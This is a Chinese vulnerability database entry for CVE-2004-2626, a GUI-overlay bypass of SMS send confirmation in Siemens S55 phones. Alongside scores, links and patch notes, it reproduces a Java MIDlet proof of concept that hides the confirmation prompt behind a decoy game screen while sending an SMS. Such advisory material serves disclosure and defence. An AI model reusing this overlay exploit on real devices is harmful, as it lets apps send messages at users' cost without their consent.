CVE-2004-2626
CVSS3.7
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 23:07:08
NMCOE    

[原文]GUI overlay vulnerability in the Java API in Siemens S55 cellular phones allows remote attackers to send unauthorized SMS messages by overlaying a confirmation message with a malicious message.


[CNNVD]Siemens S55手机SMS验证消息绕过漏洞(CNNVD-200412-407)

        
        Siemens S55是一款移动电话。
        Siemens S55在验证SMS消息时存在竞争条件错误,远程攻击者可以利用这个漏洞伪造可信任手机用户发送SMS消息。
        目前没有详细漏洞细节提供。
        

- CVSS (基础分值)

CVSS分值: 3.7 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2626
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2626
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-407
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=full-disclosure&m=108308895624565&w=2
(UNKNOWN)  FULLDISC  20040427 Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 ++++>
http://marc.info/?l=full-disclosure&m=108325033624812&w=2
(UNKNOWN)  FULLDISC  20040429 Re: Phenoelit Advisory
http://securitytracker.com/alerts/2004/Apr/1009959.html
(UNKNOWN)  SECTRACK  1009959
http://www.securityfocus.com/bid/10227
(UNKNOWN)  BID  10227
http://xforce.iss.net/xforce/xfdb/15995
(UNKNOWN)  XF  siemens-unauth-sms-message(15995)

- 漏洞信息

Siemens S55手机SMS验证消息绕过漏洞
低危 竞争条件
2004-12-31 00:00:00 2005-12-16 00:00:00
远程  
        
        Siemens S55是一款移动电话。
        Siemens S55在验证SMS消息时存在竞争条件错误,远程攻击者可以利用这个漏洞伪造可信任手机用户发送SMS消息。
        目前没有详细漏洞细节提供。
        

- 公告与补丁

        厂商补丁:
        Siemens
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.siemens-mobile.com

- 漏洞信息 (24065)

Siemens S55 Cellular Telephone SMS Confirmation Message Bypass Vulnerability (EDBID:24065)
hardware remote
2004-04-27 Verified
0 FtR
N/A [点击下载]
source: http://www.securityfocus.com/bid/10227/info

Reportedly the Siemens S55 is affected by an SMS confirmation message bypass vulnerability. This issue is due to a race condition error that allows a malicious programmer to send SMS messages from unsuspecting cellular telephone user's telephones while obscuring the confirmation request.

This issue may allow a malicious programmer to develop an application that can send SMS messages without the cellular telephone user's knowledge.

        package hello;
        import javax.microedition.lcdui.*;
        import javax.microedition.midlet.*;
        import com.siemens.mp.game.Sound;
        import com.siemens.mp.gsm.*;
        import java.lang.*;
        import java.io.*;

        public class hello extends MIDlet implements CommandListener
        {
           static final String EXIT_COMMAND_LABEL = "Exit FtRs world";
           Display             display;
           static hello        hello;

           public void startApp (){
              HelloCanva kanvas = new HelloCanva();
              Scr2 scr2 = new Scr2();
              display = Display.getDisplay(this);
              // Menu
              Command exitCommand  = new Command(EXIT_COMMAND_LABEL , Command.SCREEN, 0);
              scr2.addCommand(exitCommand);
              scr2.setCommandListener(this);
              //Data

              // screen 1
              display.setCurrent(kanvas);
              mycall();
              // screen 2
              display.setCurrent(scr2);
              //destroyApp(false);
            }

            public void mycall(){

            String SMSstr= "Test";

            try {
                /* Send SMS VALIAD NUMEBER SHALL BE IN SERTED HERE*/
                        SMS.send("0170-Numder", SMSstr);
                }
                /* Exception handling */
                catch (com.siemens.mp.NotAllowedException ex) {
                // Some handling code ...
                }
                catch (IOException ex) {
                //Some handling code ...
                }
                catch (IllegalArgumentException ex) {
                // Some handling code ...
                }
          } //public viod call()

           protected void destroyApp (boolean b){
              display.setCurrent(null);
              this.notifyDestroyed();       // notify KVM
           }

           protected void pauseApp ()
           { }

           public void commandAction (Command c, Displayable d){
              destroyApp(false);
           }

        }

        class HelloCanva extends Canvas
        {
            public void paint (Graphics g)
            {
                String str = new String("Wanna Play?");
                g.setColor(0,0,0);
                g.fillRect(0, 0, getWidth(), getHeight());
                g.setColor(255,0,0);
                g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);
                g.drawString("yes", (getWidth()/2)-35,(getHeight()/2)+35, Graphics.HCENTER | Graphics.BASELINE);
                g.drawString("no", (getWidth()/2)+35,(getHeight()/2)+35, Graphics.HCENTER | Graphics.BASELINE);
            }
        }
        class Scr2 extends Canvas
        {
            public void paint (Graphics g) {
                String str = new String("cool");
                g.setColor(0,0,0);
                g.fillRect(0, 0, getWidth(), getHeight());
                g.setColor(255,0,0);
                g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);
            }
        }		

- 漏洞信息

5703
Siemens S55 SMS Send Prompt Bypass Weakness
Local Access Required Other
Impact Unknown
Exploit Public

- 漏洞描述

Siemens S55 contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a malicious application is executed, which could trick the user into unknowingly confirmimg an SMS message prompt, granting the application the ability to send arbitrary messages.

- 时间线

2004-04-27 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站